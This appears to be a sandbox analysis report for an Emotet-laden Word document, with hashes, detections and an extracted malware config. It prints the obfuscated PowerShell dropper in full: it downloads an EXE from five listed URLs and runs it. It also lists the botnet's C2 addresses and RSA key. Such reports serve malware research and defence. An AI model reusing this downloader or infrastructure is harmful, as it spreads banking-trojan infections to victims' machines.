Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

task1

 

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    8d6151eb11f256ed1714c4e63b8647602522740d5b23a060bde1f703259cbe8e.doc

  • Size

    132KB

  • Sample

    200125-1tgg648jy2

  • MD5

    609a82dd7672ce7eaffff60004e68e51

  • SHA1

    417b7b59d41946571f5f744e9afa94f664829e53

  • SHA256

    8d6151eb11f256ed1714c4e63b8647602522740d5b23a060bde1f703259cbe8e

  • SHA512

    c683b40c6b62ff86ecc737f8e07a4c496aba9aa740bcce53ae4fd686242c4efeb9df5405c6c6f1a65ecccdd37fffcb0246860ab497bf342cc37d49e872b912fa

Score
10/10
emotetepoch2bankertrojan

Malware Config

Extracted

Language
ps1
Source
1
$Kfsoqqwaj='Znqshocn';$Sidlaggzovm = '323';$Sjltowlwr='Tgbnrivgpj';$Uzrgggyl=$env:userprofile+'\'+$Sidlaggzovm+'.exe';$Lmpnsatzzeemi='Czpnxomukrtwu';$Wmsxkfflkl=.('ne'+'w-ob'+'ject') nEt.WebcLIeNT;$Tdftnhynub='http://relprosurgical.com/wordpress/erEIWTG/*http://compunetplus.com/lacrosseleaguestats/yJpumLt4l/*https://bbs.anyakeji.com/wp-admin/5MNyBTn4B/*http://rodyaevents.com/wp-content/t8v9c/*https://emerson-academy.2019.sites.air-rallies.org/wp-admin/h4u1/'."s`PliT"([char]42);$Mxzkahyj='Ypnocofolsgav';foreach($Rzanwtuclk in $Tdftnhynub){try{$Wmsxkfflkl."D`oWn`LOADfI`Le"($Rzanwtuclk, $Uzrgggyl);$Ysfwzdzgxs='Ycpeqwqyzzg';If ((&('G'+'et'+'-Item') $Uzrgggyl)."LENg`Th" -ge 26254) {[Diagnostics.Process]::"S`TaRT"($Uzrgggyl);$Hiaumbdzbpt='Szjqvvaglvoq';break;$Wlzlxtkwq='Gekybakd'}}catch{}}$Zpikmchvnleiw='Bdvtjwjdnor'
URLs
exe.dropper

http://relprosurgical.com/wordpress/erEIWTG/
exe.dropper

http://compunetplus.com/lacrosseleaguestats/yJpumLt4l/
exe.dropper

https://bbs.anyakeji.com/wp-admin/5MNyBTn4B/
exe.dropper

http://rodyaevents.com/wp-content/t8v9c/
exe.dropper

https://emerson-academy.2019.sites.air-rallies.org/wp-admin/h4u1/

Extracted

Family

emotet

Botnet

Epoch2

C2

70.180.35.211:80

74.108.124.180:80

85.105.205.77:8080

23.92.16.164:8080

45.55.65.123:8080

217.160.19.232:8080

176.9.43.37:8080

59.103.164.174:80

70.184.9.39:8080

202.175.121.202:8090

62.75.187.192:8080

217.160.182.191:8080

201.184.105.242:443

78.142.114.69:80

159.65.25.128:8080

104.236.246.93:8080

152.168.248.128:443

24.105.202.216:443

121.88.5.176:443

92.222.216.44:8080
rsa_pubkey.plain
1
-----BEGIN PUBLIC KEY-----
2
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAKl4M80uy0jcxUiFIaJJyxgHVVnFtCq6
3
bi6f2xXPh/XUZNyN8UXDe5HzhTc4kwon9MBZffNwFOIc61QfV3K3YzEI/ktcyNqK
4
LS67ONxsVep769QdiVQJXrIaFjMXKz6viwIDAQAB
5
-----END PUBLIC KEY-----
6

Targets

    • Target

      8d6151eb11f256ed1714c4e63b8647602522740d5b23a060bde1f703259cbe8e.doc

    • Size

      132KB

    • MD5

      609a82dd7672ce7eaffff60004e68e51

    • SHA1

      417b7b59d41946571f5f744e9afa94f664829e53

    • SHA256

      8d6151eb11f256ed1714c4e63b8647602522740d5b23a060bde1f703259cbe8e

    • SHA512

      c683b40c6b62ff86ecc737f8e07a4c496aba9aa740bcce53ae4fd686242c4efeb9df5405c6c6f1a65ecccdd37fffcb0246860ab497bf342cc37d49e872b912fa

    Score
    10/10
    trojanbankeremotet

    • Emotet

      Emotet is a trojan that is primarily spread through spam emails

      trojanbankeremotet

    • Process spawned unexpected child process

    • Executes dropped EXE

    task1

MITRE ATT&CK Enterprise v6

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.